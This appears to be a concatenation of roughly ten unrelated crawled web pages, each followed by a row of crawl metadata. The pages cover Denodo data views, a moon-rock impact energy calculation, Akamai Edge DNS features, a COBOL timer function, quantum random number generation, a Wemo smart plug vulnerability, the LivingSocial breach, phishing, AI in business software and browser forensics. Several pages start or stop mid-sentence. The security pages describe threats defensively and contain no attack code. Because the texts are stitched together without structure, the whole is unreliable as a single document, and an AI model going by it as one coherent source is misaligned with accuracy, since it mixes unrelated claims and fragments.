Join views: see section Creating Join Views
Selection views: see section Creating Selection Views
Flatten views: see section Creating Flatten Views
Intersect views: see section Creating Intersection Views
Minus views: see section Creating Minus Views
Interface views: see section Creating Interface Views
We will use the following example as a guide when describing the process:
Example: Unified data about customer sales and incidents.
A telecommunications company offers phone and internet services to its clients. Data on the incidents reported in the phone service are stored in a relational database, which is accessed through JDBC. In addition, data on the incidents reported in the Internet service are stored in another relational database also accessed through JDBC.
In our example, the director of the I.T department wants to monitor the number of incidents (either telephony or Internet) notified by the clients with the greatest sales volume to establish whether measures should be taken to increase client satisfaction.
Data on customer sales volumes are managed by another department of the company. That department provides a Web Service so the other departments can access to that data.
In this example, we will see how Virtual DataPort can be used to build a unified data view to meet the needs of the I.T department, by obtaining the total number of incidents from clients with the greatest sales volumes.
SQL scripts for creating the tables used in the examples of this manual (version for the MySQL, Oracle and PostgreSQL databases).
To follow the examples of this guide, use one of these scripts to create the required tables in a database.
A WSDL file with the description of the Web service used
VQL scripts (VQL stands for Virtual Query Language) that create the objects (data sources, views, stored procedures…) that we will learn to create in this manual. You do not need to use them if you are going to follow this guide. Otherwise, edit the VQL script that matches your database:
@HOSTNAMEwith the host name of your database.
CREATE WRAPPER JDBCstatements, change the parameter
RELATIONNAME, so it matches the name of the schema in your database. E.g. change | <urn:uuid:0cc981d7-3926-4737-b244-2d02dd05fd56> | CC-MAIN-2022-40 | https://community.denodo.com/docs/html/browse/latest/en/vdp/administration/creating_derived_views/creating_derived_views | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00740.warc.gz | en | 0.858178 | 562 | 2.78125 | 3 |
But the math checks out.
First of all, she probably got the idea from Heinlein's book The Moon is a Harsh Mistress where the rebel moon colonists do just that. I doubt she did her own math, and relied upon Heinlein to do it for her. But let's do the math ourselves.
Let's say that we want to stand at the height of the moon and drop a rock. How big a rock do we need to equal the energy of an atomic bomb? To make things simple, let's assume the size of bombs we want is that of the one dropped on Hiroshima.
As we know from high school physics, the energy of a dropped object (ignoring air) is:
energy = 0.5 * mass * velocity * velocitySolving for mass (the size of the rock), the equation is:
mass = 2 * energy/(velocity * velocity)We choose "energy" as that of an atomic bomb, but what is "velocity" in this equation, the speed of something dropped from the height of the moon?
The answer is something close to the escape velocity, which is defined as the speed of something dropped infinitely far away from the Earth. The moon isn't infinitely far away (only 250,000 miles away), but it's close.
How close? Well, let's use the formula for escape velocity from Wikipedia [*]:
where G is the "gravitational constant", M is the "mass of Earth", and r is the radius. Plugging in "radius of earth" and we get an escape velocity from the surface of the Earth of 11.18 km/s, which matches what Google tells us. Plugging in the radius of the moon's orbit, we get 1.44 km/s [*]. Thus, we get the following as the speed of an object dropped from the height of the moon to the surface of the earth, barring air resistance [*]:
9.74 km/sPlugging these numbers in gets the following result:
So the answer for the mass of the rock, dropped from the moon, to equal a Hiroshima blast, is 1.3 billion grams, or 1.3 million kilograms, or 1.3 thousand metric tons.
Well, that's a fine number and all, but what does that equal? Is that the size of Rhode Island? or just a big truck?
The answer is: nearly the same mass as the Space Shuttle during launch (2.03 million kilograms [*]). Or, a rock about 24 feet on a side.
That's big rock, but not so big that it's impractical, especially since things weigh 1/6th as on Earth. In Heinlein's books, instead of shooting rocks via rockets, it shot them into space using a railgun, magnetic rings. Since the moon doesn't have an atmosphere, you don't need to shoot things straight up. Instead, you can accelerate them horizontally across the moon's surface, to an escape velocity of 5,000 mph (escape velocity from moon's surface). As the moon's surface curves away, they'll head out into space (or toward Earth)
Thus, Elon Musk would need to:
- go the moon
- setup a colony, underground
- mine iron ore
- build a magnetic launch gun
- build fields full of solar panels for energy
- mine some rock
- cover it in iron (for magnet gun to hold onto)
- bomb earth
Update: I've made a number of short cuts, but I don't think they'll affect the math much.
We don't need escape velocity for the moon as a whole, just enough to reach the point where Earth's gravity takes over. On the other hand, we need to kill the speed of the Moons's orbit (2,000 miles per hour) in order to get down to Earth, or we just end up orbiting the Earth. I just assume the two roughly cancel each other out and ignore it.
I also ignore the atmosphere. Meteors from outer space hitting the earth of this size tend to disintegrate or blow up before reaching the surface. The Chelyabinsk meteor, the one in all those dashcam videos from 2013, was roughly 5 times the size of our moon rocks, and blew up in the atmosphere, high above the surface, with about 5 times the energy of a Hiroshima bomb. Presumably, we want our moon rocks to reach the surface, so they'll need some protection. Probably make them longer and thinner, and put an ablative heat shield up from, and wrap them in something strong like iron.
I don't know how much this will slow down the rock. Presumably, if coming straight down, it won't slow down by much, but if coming in at a steep angle (as meteors do), then it could slow down quite a lot.
Update: First version of this post used "height of moon", which Wolfram Alfa interpreted as "diameter of moon". This error was found by @hiergiltdiestfu. The current version of this post changes this to the correct value "radius of moon's orbit".
Update: I made a stupid error about Earth's gravitational strength at the height of the Moon's orbit. I've changed the equations to fix this. | <urn:uuid:519e6710-901f-455b-83fc-32fe58acabb5> | CC-MAIN-2022-40 | https://blog.erratasec.com/2017/02/some-moon-math.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00140.warc.gz | en | 0.935822 | 1,086 | 3.328125 | 3 |
A DNS zone is a distinct portion or administrative space in the DNS domain name space that is hosted by a DNS server. DNS zones allow the DNS name space to be divided up for administration and for redundancy. The DNS server can be authoritative for multiple DNS zones.
All of the information for a zone is stored in a DNS zone file, which contains the DNS database records for all of the names within that zone. These records contain the mapping between an IP address and a DNS name. DNS zone files must always start with a Start of Authority (SOA) record, which contains important administrative information about that zone and about other DNS records.
You can implement Edge DNS as your primary or secondary DNS, either replacing or augmenting your existing DNS infrastructure as desired.
Whether primary or secondary, Edge DNS can provide your organization with a scalable and secure DNS network that helps ensure the best possible experience for your users. The available zone modes are:
- Primary mode. In primary mode, customers manage zones using either Akamai Control Center or the Edge DNS Zone Management API. The Edge DNS zone transfer agent pushes out your zone data to the Edge DNS name servers and provides you a list of name servers that you can register with your domain registrar.
- Secondary mode. In secondary mode, customers enable DNS zone transfers from their primary name servers to Akamai. Edge DNS name servers use authoritative transfer (AXFR) as the DNS zone transfer method for secondary zones. However, if you configured your own master names servers to support incremental zone transfers (IXFR), the Edge DNS zone transfer agents (ZTAs) will automatically do incremental zone transfer for secondary zones.
In secondary mode, you maintain zone information on your primary (master) name server, and Edge DNS zone ZTAs perform zone transfers from the primary name servers and upload these zones to Akamai name servers. ZTAs conform to the standard protocols described in RFCs 1034 and 1035 and work with most common primary name servers in use, including Internet Systems Consortium's BIND (version 9 and later), and also Microsoft Windows Server and Microsoft DNS operating systems.
Refresh and retry intervals in the start of authority (SOA) determine the interval between zone transfers. In addition, you can configure the system to accept NOTIFY requests from your primaries to allow almost immediate updates.
ZTAs are deployed in a redundant configuration across multiple physical and network locations throughout the Akamai network. All ZTAs will attempt to perform zone transfers from your master name servers, but only one (usually the first one that receives an update using one transfer) will send any given zone update to the name servers. This process uses a proprietary fault-tolerant data transfer infrastructure, thus providing a fault-tolerant system at every level.
Cross-account subzone delegation provides a mechanism for a parent zone owner to securely grant another Edge DNS account the capability to delegate subzones on the owner's existing zones. The zone owner participating in subzone grant requests needs to have their Edge DNS contract authorized for subzone grants. Contact your service representative for authorization.
After a service representative adds a zone owner's contract to the allow list, the zone owner can enable subzone delegation on a specified zone. Enabling subzone creation permits any Akamai customer to submit a subzone request on this zone.
Without an approved subzone grant request, every subzone starts in a PENDING_APPROVAL state. The subzone owner can begin building up records and uploading zone files while they wait for approval of their request from the zone owner. The zone owner is notified of any pending subzone requests and either approves or rejects them during the review process.
Zone apex mapping uses the mapping data available on the Akamai platform to reduce DNS lookup times for your websites.
With zone apex mapping, name servers resolve DNS lookup requests with the IP address of an optimal edge server. Resolving lookups in this way helps you:
- Eliminate the CNAME chains inherent with CDN solutions
- Reduce DNS lookup times for any website on the Akamai platform
- Deploy Akamai acceleration solutions for records at the zone apex for which a CNAME cannot otherwise be used
You use the AKAMAICDN private resource record type to configure zone apex mapping.
The DNS security extensions (DNSSEC), described in RFCs 4033, 4034, and 4035, allow zone administrators to digitally sign zone data using public key cryptography, proving their authenticity. The primary idea behind DNSSEC is to prevent DNS cache poisoning and DNS hijacking. These record types are used for DNSSEC:
- DNSKEY (DNS public key). Stores the public key used for resource record set signatures.
- RRSIG (resource record signature). Stores the signature for a resource record set (RRset).
- DS (delegation signer). Parent zone pointer to a child zone's DNSKEY.
- NSEC3 (next secure v3). Used for authenticated NXDOMAIN.
The Security Option contract item of Edge DNS supports these features:
- DNSSEC "sign and serve". Akamai manages signing the zone, key rotation, and serving the zone.
- DNSSEC "serve". You manage signing the zone and key rotation, while Akamai serves the zone.
The DNSSEC sign and serve feature provides the ability to offload the DNSSEC support entirely to Akamai's existing key management infrastructure (KMI) for the zone signing key (ZSK) and key signing key (KSK) rotation.
The ZSK is rotated weekly and the KSK is rotated annually. For zone key rotation, Akamai uses RFC 4641's
prepublish key rollover method, modified for constant rotation. That is, two ZSKs are present in the zone apex DNSKEY record. One key actively signs the rest of the zone, while the other key is present so it has time to propagate before becoming active. This method:
- Introduces a new, as of yet unused, DNSKEY record into the apex DNSKEY RRset.
- Waits for the data to propagate (propagation time plus keyset TTL).
- Switches to signing the zone's RRSIGs with the new key, but leaving the previous key available in the apex DNSKEY RRset.
- Waits for propagation time plus maximum TTL in the zone.
- Removes the old key from the apex DNSKEY RRset, which will then restart the key rotation process.
Signature duration is three days. To be sure signatures don't reach expiration, even if records are not being modified, the zone is re-signed at least once per day.
An added benefit of DNSSEC sign and serve is the ability to support top-level redirection. The current recommended algorithm is ECDSA-P256-SHA256, or RSA SHA-256 if you want to avoid the use of ECDSA.
DNSSEC can be used with both ZAM and top-level redirection.
The DNSSEC serve feature provides the ability to support DNSSEC for secondary zones, but the zone administrator is responsible for implementing their own key management infrastructure (KMI) solution and properly rotating their zone signing key (ZSK) and key signing key (KSK).
DNSSEC requires transaction signature (TSIG). For zone access control, you need to enable TSIG with the supported algorithms. In addition to your responsibility for all of the key signing, you must ensure that all the necessary new records are in the zone transfer to Akamai.
Subset RRsets of self-signed zones not served
If you have a self-signed zone, Edge DNS won't serve subset RRsets. It will serve the full RRset as defined in your zone. If the RRset is too large for the standard DNS packet size, your end users' caching name servers will need to negotiate a larger packet size with extension mechanisms for DNS (EDNS0), or else use TCP. If you're concerned about end users' name servers not having this functionality, configure smaller RRsets in your zone.
An alias zone is a zone type that does not have its own zone file. Instead, it bases itself on another Edge DNS (base) zone's (either primary or secondary) resource records. In other words, the zone data is a copy of another Edge DNS zone. You can modify data in alias zones by changing the "parent" or "alias-of" zone.
An organization may have several hundred vanity or brand domains that need to be registered and for which DNS services are required, but for which DNS is configured identically to a base zone. In these cases you can configure one base zone, point many aliases to the base zone, and easily manage any DNS changes by updating only the base zone file.
Default limit for contracts is 2,000
By default, Edge DNS contracts are limited to 2,000 configured zones, including aliases. Contact technical support if you need to exceed this limit.
Alias zones generate their own log lines independent of their base zone. To receive logs with alias zone traffic, you need to enable log delivery for each alias zone individually.
Alias zones are compatible with:
- Zone apex mapping
- Top-level CNAME (Can only be configured by technical support.)
- Vanity name servers (These name server records should not be from a base zone with aliases.)
When using these features, pay attention before adding alias zones. Check the property receiving the traffic in Akamai Property Manager, ensuring that the appropriate hostnames are configured and that the correct redirects are set up. If HTTPS support is required, make sure that the certificates are configured correctly. With a certificate that supports subject alternative names (SAN), this typically means adding the domain apex to the certificate.
Alias zones are not compatible with DNSSEC. Each DNSSEC zone requires its own resource record signatures. Base zones with DNSSEC enabled can't have any aliases.
This example is displayed in standard BIND zone format.
example-base-zone.com base zone has the following resource records:
|Zone name||TTL||Record class||Record type||Record data|
example-alias-zone.com zone is configured as an alias of
www.example-base-zone.com. Any time a DNS request asks for resolution of a resource record in the alias zone, Edge DNS will answer with the resource records specified in the base zone, as if the alias zone had the same resource records as the base zone.
|Zone name||TTL||Record class||Record type||Record data|
Any time a change is made to the base zone's resource records, all the aliases of that zone will reflect the same change.
When configured on Edge DNS, alias zones receive traffic like any other zone and are counted as regular zones from a billing standpoint.
For example, if a Edge DNS contract allows for 50 zones, and 20 regular zones and 30 alias zones are configured, then these 50 zones will be within the contract entitlement. If 5 additional alias zones are configured, then the total of 55 zones will incur a 5 zone overage based on the per-zone overage rate.
Edge DNS supports the Internet (IN) class and the following record types.
- A. IPv4 address.
- AAAA. IPv6 address.
- AFSDB. AFS database.
- AKAMAICDN. Akamai private resource record for zone apex mapping.
- AKAMAITLC. Akamai private resource record for top-level CNAME. Can be configured only by technical support. Akamai recommends using AKAMAICDN instead.
- CAA. Certification authority authorization.
- CERT. Certificate record that stores public key certificates.
- CDNSKEY. Child copy of the DNSKEY record, for transfer to parent. To add record sets of this type, use the Edge DNS Zone Management API.
- CDS. Child copy of the DS record, for transfer to parent. To add record sets of this type, use the Edge DNS Zone Management API.
- CNAME. Canonical name.
- DNSKEY. DNS key. Stores the public key used for RRset signatures. Required for DNS security extensions (DNSSEC).
- DS. Delegation signer. Parent zone pointer to a child zone's DNSKEY. Required for DNSSEC.
- HINFO. System information.
- HTTPS. Hypertext Transfer Protocol Secure.
- LOC. Location.
- MX. Mail exchange.
- NAPTR. Naming authority pointer.
- NS. Name server.
- NSEC. Next secure. Available for self-signed secondary zones only. NSEC3 is a better choice.
- NSEC3. Next secure, version 3. Used for authenticated NXDOMAIN. Required for DNSSEC.
- NSEC3PARAM. NSEC3 parameters.
- PTR. Pointer.
- RP. Responsible person.
- RRSIG. Resource record set (RRset) signature. Stores the digital signature used to authenticate data that is in the signed RRset. Required for DNSSEC.
- SSHFP. Secure shell fingerprint record. Identifies SSH keys that are associated with a host name.
- SOA. Start of authority record. Stores administrative information about a zone, including data to control zone transfers. To add record sets of this type, use the Edge DNS Zone Management API.
- SPF. Sender policy framework.
- SRV. Service locator.
- SVCB. Service bind.
- TLSA. Transport Layer Security Authentication certificate association. Used to associate a TLS server certificate or public key with the domain name where the record is found.
- TXT. Text.
- ZONEMD. Message digests for DNS zones. To add record sets of this type, use the Edge DNS Zone Management API.
Updated 11 months ago | <urn:uuid:89a2253d-80bc-4e57-955c-545d1a0677c8> | CC-MAIN-2022-40 | https://techdocs.akamai.com/edge-dns/docs/features | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00140.warc.gz | en | 0.828941 | 3,086 | 2.8125 | 3 |
The INTERVAL-TIMER function returns the number of seconds starting from an arbitrary point in time. Typically, you will want to use the function twice or more in order to take differences between the return values in order to time something.
Another potential use would be to obtain a higher-resolution timestamp to distinguish items with identical keys.
The return value is not an integer. The exact precision varies widely between systems, but should be at minimum one microsecond (higher for most machines). A variable with at least four digits after the decimal point is recommended to hold the result (though that is not required). Floating point would also be a recommended variable type.
The return value by itself has no preset meaning; it is just an arbitrary number of seconds, measuring real time (as opposed to CPU-only time). Compare it to a second return value for meaning. If the host system does not have an appropriate timer available, then the function will always return a value of zero.
Normally, the timer will only increase in value for any one process. In some implementations, the timer may reset to zero at midnight.
The following example shows how, by setting an arbitrary starting point (the result of the something-long section), you can use the interval-timer function to measure time elapsed.
working-storage section. 77 start-time double. 77 elapsed-time double. 77 display-time pic zzzz.9(4). 77 dummy pic 9(3)9(6). procedure division. main-logic. display standard window. display "Running..." move function interval-timer to start-time perform something-long compute elapsed-time = function interval-timer - start-time move elapsed-time to display-time display "Something-Long took ", display-time, " seconds to run" accept omitted. stop run. something-long. perform 1000000 times compute dummy = function sqrt(123) end-perform. | <urn:uuid:87daa6f7-7366-4893-afe2-f1a04cbe2a35> | CC-MAIN-2022-40 | https://www.microfocus.com/documentation/extend-acucobol/1031/extend-Interoperability-Suite/GUID-AF738869-E5FB-424E-AD44-D25396D4F2A2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00140.warc.gz | en | 0.867514 | 411 | 3.578125 | 4 |
The importance of randomness in a quantum world
Quantum computing has the power to revolutionise the world we live in, but like all technology it can be used for harm as well as good. Quantum cybersecurity is becoming a necessity for all those who value the integrity and security of their data.
In its latest report looking at quantum computing, the IBM Institute for Business Value highlights the potential quantum technologies have to become ‘a double-edged sword’; one that will expand computing power and offer opportunities for improving cybersecurity, whilst exposing vulnerabilities in current encryption methods.
IBM reference the risks posed to both symmetric-key cryptography (where the same key is used to encrypt and decrypt data) and asymmetric aka Public Key cryptography (where two different, but related, keys are used).
With the long-term security of current cryptographic methods in doubt, enterprises and governments alike are investing in the development of new, quantum-safe cryptographic solutions. Two of these technologies Quantum Random Number Generation (QRNG) and Quantum Key Distribution (QKD) leverage the principles of quantum physics to counter the emerging threat of the quantum computer.
The importance of randomness
Randomness (entropy) is the cornerstone of cryptography as it is used to generate session keys. The more random the numbers, the more secure the cryptographic system. The challenge then, becomes one of generating true randomness.
Many of today’s systems use pseudo-random number generation. However, these systems are vulnerable as they rely upon external sources of entropy and do not generate truly random numbers. Software-based random number generators (RNGs) are deterministic and do not provide true randomness.
Hardware-based RNGs that exploit the principles of classical physics provide a greater degree of entropy, but even these are susceptible to influence and lack true randomness. Whilst these patterns are almost impossible for classical computers to recognise, the same cannot be said for a quantum computer.
For genuine entropy, cryptographers are turning to quantum random number generation (QRNG). These hardware-based systems exploit the principles of quantum physics to generate truly random numbers and offer greater resistance to external or environmental perturbation.
“Quantum Random Number Generators (QRNGs) can be thought of as a special case of TRNGs in which the data is the result of quantum events. But unlike traditional TRNGs, QRNGs promise truly random numbers by exploiting the inherent randomness in quantum physics. A true random number generator provides the highest level of security because the number generated is impossible to guess.” – IBM Institute for Business Value
Provable forward secrecy
Quantum has a role to play beyond key generation. The principle of “observation causes perturbation” is an essential component in forward secrecy. Although the IBM report doesn’t address quantum key distribution (QKD), it is an important part of the quantum-safe cryptography story.
To “eavesdrop” on a communication, any unauthorised third party will need to observe the key in a quantum state. This act of observation introduces detectable anomalies, alerting the system to the breach. QKD is already being used in real-world applications, working in conjunction with symmetric key cryptography to provide provable forward secrecy.
Data security for the present and future
With the impending arrival of mainstream quantum computers, QRNG and QKD are two technologies that security-aware organisations should be considering if they are to ensure the long-term protection of their data.
Although it may be tempting to delay change until a viable quantum computer becomes available, the quantum threat is just as relevant today. The long-term value of much of the data transmitted across high-speed networks means a patient cyber-criminal can capture the data today and decrypt it later.
“Even though large-scale quantum computers are not yet commercially available, initiating quantum cybersecurity solutions now has significant advantages. For example, a malicious entity can capture secure communications of interest today. Then, when large-scale quantum computers are available, that vast computing power could be used to break the encryption and learn about those communications.” – IBM Institute for Business Value
Four steps to take now
- Identify, retain and recruit for the necessary quantum cybersecurity skills. These people will become the organisation’s cybersecurity champions; collaborating with standards bodies and creating its quantum security transition plan
- Begin to identify where quantum-safe security methods should be adopted by assessing potential areas of security exposure
- Keep up-to-date with news and advances in quantum-safe cybersecurity standards and emergence of security solutions
- Work with encryption solution providers to deploy quantum-safe solutions
Like to find out more about Quantum Random Number Generation? Download our White Paper: What is the Q in QRNG? | <urn:uuid:dc2f9104-3b08-4e92-8afa-9d35e7e4e35f> | CC-MAIN-2022-40 | https://www.idquantique.com/the-importance-of-randomness-in-a-quantum-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00140.warc.gz | en | 0.895232 | 985 | 2.890625 | 3 |
*This blog is originally from August 2018 and was updated April 2019*
From connected baby monitors to smart speakers — IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users can be prone to putting basic security hygiene on the backburner when they get a shiny new IoT toy, such as applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. Additionally, IoT devices’ poor security standards make them conveniently flawed for someone else: cybercriminals, as hackers are constantly tracking flaws which they can weaponize. When a new IoT device is put on the market, these criminals have a new opportunity to expose the device’s weaknesses and access user networks. As a matter of fact, our McAfee Labs Advanced Threat Research team uncovered a flaw in one of these IoT devices: the Wemo Insight Smart Plug, which is a Wi-Fi–connected electric outlet.
Once our research team figured out how exactly the device was vulnerable, they leveraged the flaw to test out a few types of cyberattacks. The team soon discovered an attacker could leverage this vulnerability to turn off or overload the switch, which could overheat circuits or turn a home’s power off. What’s more – this smart plug, like many vulnerable IoT devices, creates a gateway for potential hackers to compromise an entire home Wi-Fi network. In fact, using the Wemo as a sort of “middleman,” our team leveraged this open hole in the network to power a smart TV on and off, which was just one of the many things that could’ve been possibly done.
And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.
Now, our researchers have reported this vulnerability to Belkin, and, almost a year after initial disclosure, are awaiting a follow-up. However, regardless if you’re a Wemo user or not, it’s still important you take proactive security steps to safeguard all your IoT devices. Start by following these tips:
- Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
- Change default passwords and do an update right away. If you purchase a connected device, be sure to first and foremost change the default password. Default manufacturer passwords are rather easy for criminals to crack. Also, your device’s software will need to be updated at some point. In a lot of cases, devices will have updates waiting from them as soon as they’re taken out of the box. The first time you power up your device, you should check to see if there are any updates or patches from the manufacturer.
- Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
- Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:ff1002a9-ef87-49d5-bd48-da658cea5a72> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/consumer-threat-reports/wemo-vulnerability | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00140.warc.gz | en | 0.945248 | 897 | 2.65625 | 3 |
Each year, the number of cyberattacks that result in data breaches grows higher. Recently, the daily deals site LivingSocial suffered a massive cyberattack that resulted in a data breach impacting 50 million customers. The company is requiring all users to reset their passwords in case they have been compromised. LivingSocial said that customer credit card information was not stolen because it was stored in a separate database, adding that although customer passwords were taken, they were encrypted and scrambled, so might not be useable.
“Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one,” LivingSocial CEO Tim O’Shaughnessy said in an email.
How does this impact customers?
Although the company said customers shouldn’t be concerned about the broader implications of this breach, some IT analysts pointed out that the hackers still made off with personal information about customers, like addresses, emails, birth dates and other data. After it’s decrypted, it could be used for nefarious purposes, like trying to steal someone’s identity. Customers that use the same password across multiple sites could also experience a user trying to hack into their other accounts.
Another concern is that the hacker could use the email address and name from an account to send out a phishing attack. Cyberthieves could send an email that appears to be legitimate and from a real company and trick users into submitting passwords, financial data or other confidential information.
“[They could] send out millions of emails saying they’re LivingSocial, and get users to change their passwords,” said one security researcher. “The biggest risk to people is clicking a link in an email.”
Cybersecurity best practices
This incident underlines the importance of being cautious about where confidential information is stored. Any data that is entered onto a public computer should be erased entirely so that it is not usable or accessible to others. Some software can erase information stored on public computers in business settings, schools, libraries or other facilities.
It’s also critical that users follow best practices when it comes to internet safety, checking that emails are from legitimate sources and using strong passwords that vary across different sites. As these kinds of breaches become more common, only smart and proactive behavior will help individuals remain ahead of these kinds of problems.
What are other ways that users can protect themselves from cyberattacks and these kinds of issues? Please share your thoughts below. | <urn:uuid:98046984-14f0-4e91-91a0-dfa29a05342a> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/livingsocial-hacked-account-passwords-stolen | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00341.warc.gz | en | 0.949175 | 525 | 2.828125 | 3 |
One of the most common social engineering attacks is phishing. Phishing is an attempt to access sensitive information through electronic communication. This is familiar to most people in the form of the stereotypical “Nigerian prince” email. The email promises money in exchange for help, but in order to receive the money, the user must provide account information.
Those types of clichés are so well-known that they (probably) never work anymore. Instead of targeting individual email accounts, phishing attempts are now targeting corporations. There is not only more at stake, but there is also the chance that a person dedicated to providing good customer service will be especially responsive to a scammer or be overwhelmed with work to the point that they respond quickly without thinking.
When scammers realized phishing really worked, they got more sophisticated. By doing a little bit of investigation, they are often able to determine the job title, business role and other details of an individual. With that information in hand, they can conduct targeted attacks, which are known as spear phishing. By providing a plausible-sounding story with enough details, the spear phisher can trick a person into responding with confidential information or details that will help them access private networks. Specific attacks might impersonate a known individual such as the CEO (easily determined from most company websites) and ask for specific vital information in a hurry. After all, who ignores an urgent request from the CEO?
Some attempts work the other way around, targeting the c-level executives at a company with spear phishing. This is known as whaling. Disguised with a sense of urgency and often including details of business transactions or alleged issues with the company (all based on publicly available information), the whaling attack attempts to convince the target to do something like click on a link. The supposed urgency or seriousness of the situation compels the individual to ignore normal security precautions and common sense.
While spam and junk email filters do a good job of removing the most obvious generalized phishing attacks, spear phishing and whaling attacks often come in as normal emails with none of the telltale signs of a clumsy cyberattack.
The only real defense against these is security training and a healthy suspicion of all electronic communication. Several organizations have recently discovered the drastic consequences of falling for phishing or another social engineering attack. | <urn:uuid:9a5f43ef-2e2b-4077-ae03-420a0f925d82> | CC-MAIN-2022-40 | https://entint.com/blog/cybersecurity/nine-it-vulnerabilities-and-threats-you-may-not-know-about/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00341.warc.gz | en | 0.958779 | 478 | 2.859375 | 3 |
You have seen the Hollywood interpretations of artificial intelligence (AI). There is the evil AI we remember from HAL in “2001 – a Space Odyssey” through “War Games” to SkyNet in the “Terminator” film series. And there is the good or at least well-meaning AI in “I, Robot” and “A.I. Artificial Intelligence”.
But what about AI in the real world? Isn’t that something that was hot 15 years ago, but we haven’t heard much of since? Is AI actually used for anything practical these days? Well, yes and no. In fact, many of the technologies that stem from AI research are used quite frequently today, but they are rarely called AI. One example would be the electronic “customer service agent/avatar” seen on many web sites—they often use AI disciplines such as case-based reasoning, machine learning, and natural language processing. Or perhaps you remember the Tamagotchi ? Or control systems robots, or air traffic control, or…
What about business applications then?
If AI can find practical use in a wide range of applications, what about automating some of the decisions that we do manually in our businesses today? Or what about using AI to provide a better alternative to rule-based processing which we use so much of in our business applications?
Under the umbrella of IFS Labs, we put that very question to two students from the Chalmers University of Technology. Over the past few months, they have as their Master’s Thesis studied possible approaches, evaluated potential use cases, built a prototype for one of them and tested it on actual data from an IFS customer.
After evaluating a handful of scenarios, they decided to try applying machine learning to the scenario of selecting from which supplier to buy a certain part when there is more than one supplier that can provide that same part. Most organizations today either select supplier manually or use very simple rules such as always buying from default supplier unless they are out of stock in which case another supplier is used. It is reasonable to assume that such simple rules, or manual choices, will not be optimal for large volume purchases.
The idea was that after some initial training (where the most skilled buyers make the choice) the AI would learn how various factors such as price, lead time, delivery accuracy, and quality affects the choice. The AI would then be able to pick supplier automatically, or for those who are less willing to trust in machines show a recommendation for the buyer who then makes the final decision.
The findings? Well, with just a little training the AI managed to make decisions with low error rate. It was also stable enough not to be thrown by some errors or “wrong decisions” in the training data. The algorithms used also turned out to have some other interesting uses. For example, as a side-effect, they identify trends on suppliers, for example, if a certain supplier tends to get picked (for the reasons of price, quality etc.) more or less frequently. This can provide valuable intelligence for purchasers to see which suppliers to phase out, re-negotiate deals with etc.
Confirmed or Busted?
Is the idea of using AI for automation of business decisions confirmed or busted? In myth-busters terminology, I would have to say plausible.
The problem is not with the AI itself—the algorithms developed work well—but with the scenario and real life data quality. For this to work well (and be worth the while) you need a high volume of decisions where there are multiple choices and up-to-date values for all variables that may affect the decision. Taking the “choice of supplier” scenario as an example lack of up-to-date price or lead time information for all alternative suppliers would lead to decisions made on wrong assumptions.
Actually, the students successfully tested the algorithm on a purchase of home electronics, where exactly the same product can be bought from a large range of suppliers, and online price comparison sites provide accurate information about price, available quantity, supplier quality rating etc. Unfortunately, there are not many industries or product categories where this data is as readily available.
There are other potential applications, for example in manufacturing when allocating resources during production line planning, AI could aid in selecting the best resource for a particular job. This can be done based on various features, such as availability, reliability, production speed, deadlines and other requirements. The algorithm will learn preferences of resource allocation and apply them to new cases. The advantage of using the algorithm over traditional planning would be that it could consider more features than a human planner, and can learn from evidence rather than stick to fixed algorithms used by automatic planning engines.
Do I think it could work? Yes, I do. Do I know in what business process, and for what decisions, it would be truly useful in real life? No, I don’t. If you do – drop me a line. We might just go ahead and try it. | <urn:uuid:f547889f-0c20-4127-b943-85a3d5a4f198> | CC-MAIN-2022-40 | https://blog.ifs.com/2012/11/i-robot-can-artificial-intelligence-play-a-role-in-business-applications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00341.warc.gz | en | 0.956668 | 1,036 | 2.921875 | 3 |
Web page reconstruction is a vital feature of any forensic software used for analysing browser history. Web page reconstruction is the process of using HTML and other resources stored in the web browser cache to rebuild a web page, allowing it to be easily viewed in the state it was originally seen by the user. This can be a great piece of visual evidence to include in a report, as we all know "a picture is worth a thousand words
We have had web page reconstruction functionality built into our tools FoxAnalysis
for many years. However, when designing our new tools Browser History Viewer
